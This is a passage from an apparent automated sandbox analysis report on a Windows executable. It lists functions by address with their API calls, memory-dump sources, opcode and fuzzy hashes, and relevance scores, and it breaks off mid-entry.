                                                    • ScreenToClient.USER32 ref: 0044B5B6
                                                    • ScreenToClient.USER32 ref: 0044B5DA
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044B5F5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: 9705c7d0b55c770f3ea6116ea2ba8af31c3030b152d1070b7ab32a249947d569
                                                    • Instruction ID: 25749f3764f1ed47b0e86d151e63799a5f4f88c375b46d9df5a9cc175d8c1be4
                                                    • Opcode Fuzzy Hash: 9705c7d0b55c770f3ea6116ea2ba8af31c3030b152d1070b7ab32a249947d569
                                                    • Instruction Fuzzy Hash: 421143B9D00109EFDB41CFA9D884AEEFBF9FB19310F108166E914E2620D735AA558F94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044C00C, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C134D
                                                      • Part of subcall function 003C12F3: SelectObject.GDI32(?,00000000), ref: 003C135C
                                                      • Part of subcall function 003C12F3: BeginPath.GDI32(?), ref: 003C1373
                                                      • Part of subcall function 003C12F3: SelectObject.GDI32(?,00000000), ref: 003C139C
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0044C030
                                                    • LineTo.GDI32(00000000,?,?), ref: 0044C03D
                                                    • EndPath.GDI32(00000000), ref: 0044C04D
                                                    • StrokePath.GDI32(00000000), ref: 0044C05B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    • Opcode ID: d6480acffe42f8c3c79c58c4345c68dfa51f65c5e113090cadf8b9d1fb35982c
                                                    • Instruction ID: 739278bf2f5ce43bb30662c08b6e0937c1076837cb074bab0f51f0914efeb93a
                                                    • Opcode Fuzzy Hash: d6480acffe42f8c3c79c58c4345c68dfa51f65c5e113090cadf8b9d1fb35982c
                                                    • Instruction Fuzzy Hash: 94F0BE35002269BBDB226F90AC0DFCE3F58AF06310F048024FA11610E287B90954CBAD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A37C, Relevance: 6.0, APIs: 4, Instructions: 31threadwindowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageTimeoutW.USER32 ref: 0041A399
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0041A3AC
                                                    • GetCurrentThreadId.KERNEL32 ref: 0041A3B3
                                                    • AttachThreadInput.USER32(00000000,?,0041A554,?,00000001,0044F910,?,00000001), ref: 0041A3BA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: 4e76cfd7ef6cf73151f5952f9ca1ffdf36a247ee651525889100c4bb4c0bca4c
                                                    • Instruction ID: 74629939561199d36051989aca6f7facfba2aab15ed6ae0bdacf806e01bb520a
                                                    • Opcode Fuzzy Hash: 4e76cfd7ef6cf73151f5952f9ca1ffdf36a247ee651525889100c4bb4c0bca4c
                                                    • Instruction Fuzzy Hash: 15E03931142228BAEB211B61DC0DEE73F5CEF173A2F018032F909840A0C6768595CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C2218, Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 003C2231
                                                    • SetTextColor.GDI32(?,000000FF), ref: 003C223B
                                                    • SetBkMode.GDI32(?,00000001), ref: 003C2250
                                                    • GetStockObject.GDI32(00000005), ref: 003C2258
                                                    • GetWindowDC.USER32(?,00000000), ref: 003FC0D3
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 003FC0E0
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 003FC0F9
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 003FC112
                                                    • GetPixel.GDI32(00000000,?,?), ref: 003FC132
                                                    • ReleaseDC.USER32 ref: 003FC13D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: 59510448e511612760b05447146756cfd6e282d2c0886a95dee54eeec7a7a903
                                                    • Instruction ID: 30542f3a54e7c5a9d24349642b0278da27c720deca22469610b64778ec6c57c0
                                                    • Opcode Fuzzy Hash: 59510448e511612760b05447146756cfd6e282d2c0886a95dee54eeec7a7a903
                                                    • Instruction Fuzzy Hash: 22E03036140148EAEB111FA4FC09BE97B14DB06336F018376F669580E2C7714984DB11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418C5A, Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00418C63
                                                    • OpenThreadToken.ADVAPI32(00000000,?,004186DD,?,?,?,0041886B), ref: 00418C6A
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,004186DD,?,?,?,0041886B), ref: 00418C77
                                                    • OpenProcessToken.ADVAPI32(00000000,?,004186DD,?,?,?,0041886B), ref: 00418C7E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    • Opcode ID: 33f043da582b6f07df67bdbcf96174af9c967a7782a9ad7f98a5b0e2354f65a2
                                                    • Instruction ID: 928a196794d910a8d50b455e4e8710301db82582a3dc5ea15b7177fc65a72823
                                                    • Opcode Fuzzy Hash: 33f043da582b6f07df67bdbcf96174af9c967a7782a9ad7f98a5b0e2354f65a2
                                                    • Instruction Fuzzy Hash: 4FE0863A542211DBE7205FB45D0DB973BA8FF52792F044838B281C9040EA344489CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402187, Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: dddaffc34549c5be0507ed6b8011e8ca043e086d56ce1658b0b42cd0461aff93
                                                    • Instruction ID: ca65a2c04c9ca6a93cfcf17e8fbe8f500bd4b3f94346ccd87ddcc5ed286902e5
                                                    • Opcode Fuzzy Hash: dddaffc34549c5be0507ed6b8011e8ca043e086d56ce1658b0b42cd0461aff93
                                                    • Instruction Fuzzy Hash: 65E0ED79800204EFDB119FA4D90CA9E7FB4EB49351F11843AF959D6260C77890469F54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040219B, Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 23802c35c188afc0803b99f7809ff0daea56cc68aa88a9487e0ac12f9bd4578e
                                                    • Instruction ID: dbb26c4c08e34ef1c1f17100e05fe087e42392ba71dae7a0ceab54277774b1cf
                                                    • Opcode Fuzzy Hash: 23802c35c188afc0803b99f7809ff0daea56cc68aa88a9487e0ac12f9bd4578e
                                                    • Instruction Fuzzy Hash: E8E0E5BA800204AFCB11AFB4D80CA9EBFA8EB49311F128429F959D6220CB3890459F54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042ED8E, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: X
                                                    • API String ID: 0-3081909835
                                                    • Opcode ID: 14a2f5f41a866be673275f94c9ff662a1063f518ad0132eacf72353c7570786e
                                                    • Instruction ID: 3c5347587f2ac3ebfd36ef3de69b0b9db7b03e35387aba278af60185d4cbb818
                                                    • Opcode Fuzzy Hash: 14a2f5f41a866be673275f94c9ff662a1063f518ad0132eacf72353c7570786e
                                                    • Instruction Fuzzy Hash: 0DC18D316083509FC715EF24D885FABB7E4AF85310F41492EF8998B2A2DB34EC45CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003D2AB7, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 003D2AC8
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 003D2AE1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: 1a3d0179c2f6abc15ed5b524bcbd0b31de0dc7971e77962c973cc5324dc61d36
                                                    • Instruction ID: 5d586dff0619b99b9af1a3bafa92ddb6f67ba78f41646c22e6d9d8d2c3f58ae9
                                                    • Opcode Fuzzy Hash: 1a3d0179c2f6abc15ed5b524bcbd0b31de0dc7971e77962c973cc5324dc61d36
                                                    • Instruction Fuzzy Hash: 70514971418744DBD321AF11D88AFABB7E8FF84310F42485EF1D9851A1EB709929CB66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040099E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID: DtH$DtH
                                                    • API String ID: 1473721057-3197090414
                                                    • Opcode ID: 6c662c069f8f6099992c71b7cc28222f76658a93972610a3e4264260a9a4c301
                                                    • Instruction ID: 7ccf447aa42e045295315cd5c8a95bd45849b6a6444405802b7a75f0bc8ecfa6
                                                    • Opcode Fuzzy Hash: 6c662c069f8f6099992c71b7cc28222f76658a93972610a3e4264260a9a4c301
                                                    • Instruction Fuzzy Hash: EB5110786087468FC755CF18C490B1ABBF1BB99358F65886DE981CB361D732EC81CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446CD2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?), ref: 00446D86
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00446DC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: 0e9b298afcb19006627c39e23786d201d7c5379b3de1aa50d6773243596fe912
                                                    • Instruction ID: 90c26902636e433d3f9a5dbf22fcf9f659d99ad32c195bdafc8411f43359c64b
                                                    • Opcode Fuzzy Hash: 0e9b298afcb19006627c39e23786d201d7c5379b3de1aa50d6773243596fe912
                                                    • Instruction Fuzzy Hash: 7631B071600604AAEB109F74DC84FFB77B8FF49324F11861EF8A997190CA35AC51CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446943, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004469D0
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004469DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: 4d242a818ced0cf41c166f643f569b564d3b3a8ec4f75198faa41c5bc2a075e9
                                                    • Instruction ID: 0571a1b0ad42937c47cb6c60db84f1b7b3bf8a09698d631918056207231029b1
                                                    • Opcode Fuzzy Hash: 4d242a818ced0cf41c166f643f569b564d3b3a8ec4f75198faa41c5bc2a075e9
                                                    • Instruction Fuzzy Hash: 6611C8B2200108BFFF159F54DC80EFB376EEB963A4F12412AF55897290C6799C5187A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446E76, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                                                      • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                                                      • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                                                    • GetWindowRect.USER32 ref: 00446EE0
                                                    • GetSysColor.USER32(00000012), ref: 00446EFA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: 07af70afde444c7d172792978948d5ab74fe150b9ee7641c5a8ddcabe8845a5c
                                                    • Instruction ID: 1abc8175de722502692b373b0ffc1843fd6c7c39cdfe116c31c26246ae4a17c7
                                                    • Opcode Fuzzy Hash: 07af70afde444c7d172792978948d5ab74fe150b9ee7641c5a8ddcabe8845a5c
                                                    • Instruction Fuzzy Hash: E021A67261020ABFEB04CFA8DC45EFB7BB8EB09314F01062AF941D2240D639E8219B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446B8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00446C11
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00446C20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: f5c6aef2da246d5319aeba33056bb92893a45297125b5e64b50730ad4efb5de3
                                                    • Instruction ID: 968da6f2028660f20d26c618f26e05b1ed40669d810c64dd0c5cc6d2fe1beb39
                                                    • Opcode Fuzzy Hash: f5c6aef2da246d5319aeba33056bb92893a45297125b5e64b50730ad4efb5de3
                                                    • Instruction Fuzzy Hash: C911DD71100118ABFB104F24DC85EFB3B6DEB06378F22072AF960D62D0C639EC819B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004324CA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00432520
                                                    • InternetSetOptionW.WININET(00000000,00000032,00000003,00000008), ref: 00432549
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 63f2095589102f12e53d2cc5bef33e0caa7cfb808ca55fc9cbc6d63324313d57
                                                    • Instruction ID: db02d255e4b9e0bdf30eb9379195a1e994be1b062c30107c0f423c64b390e2f4
                                                    • Opcode Fuzzy Hash: 63f2095589102f12e53d2cc5bef33e0caa7cfb808ca55fc9cbc6d63324313d57
                                                    • Instruction Fuzzy Hash: 9F1132B0200225BADB248F11CD99EFBBF6CFB1A395F10912BF50552140D3B82A45DAB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004380A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0043830B: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004380C8,?,?,?,?), ref: 00438322
                                                    • inet_addr.WSOCK32(?,?,?,?,?,?,00000000), ref: 004380CB
                                                    • htons.WSOCK32(?,?,00000000), ref: 00438108
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 2496851823-2422070025
                                                    • Opcode ID: bc198c299326ac8fbcc6057555339b51433744f99c48f8005ab37d2b5ba1f493
                                                    • Instruction ID: 06c686f0e3b79385aced4b3151f863795623b4e2388cf69fbef798a0fd23774e
                                                    • Opcode Fuzzy Hash: bc198c299326ac8fbcc6057555339b51433744f99c48f8005ab37d2b5ba1f493
                                                    • Instruction Fuzzy Hash: 1D118E75200209ABDB10AFA4DC86FFEF738EF05364F20851FF5259B292CA36A855C759
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004192E7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
                                                    • SendMessageW.USER32(?,000001A2,000000FF,00000005), ref: 00419355
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClassMessageNameSend
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 3678867486-1403004172
                                                    • Opcode ID: 36cb7a227f2a0abcf08ec74cd1912d31a00d342b3d234ab93cec06c7efb4e9fd
                                                    • Instruction ID: eac766f58bf0b376cf03968e983ac025e614ebe9dfa8715e6f202fc56a8c4eb5
                                                    • Opcode Fuzzy Hash: 36cb7a227f2a0abcf08ec74cd1912d31a00d342b3d234ab93cec06c7efb4e9fd
                                                    • Instruction Fuzzy Hash: 1001C4725061186BCB05EBA0CC92DFE776CEF06360714061EF931971D1DA252D488754
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004191DF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
                                                    • SendMessageW.USER32(?,00000180,00000000,00000005), ref: 0041924D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClassMessageNameSend
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 3678867486-1403004172
                                                    • Opcode ID: 735b182c72e8191fd42d0102fb4852dd5b2e8fe4808b37f740e442f4ae15891c
                                                    • Instruction ID: 333df1c4e2b32cc2c94f9ee4f2cdb6adaa933557ddd7cee09a42c6cbb9331632
                                                    • Opcode Fuzzy Hash: 735b182c72e8191fd42d0102fb4852dd5b2e8fe4808b37f740e442f4ae15891c
                                                    • Instruction Fuzzy Hash: 6D01D472A421087ADB06E7E0DC92EFF736CDF06380B20006EF502A7181EA296F489775
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419264, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041B0C4: GetClassNameW.USER32 ref: 0041B0E7
                                                    • SendMessageW.USER32(?,00000182,00000005,00000000), ref: 004192D0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
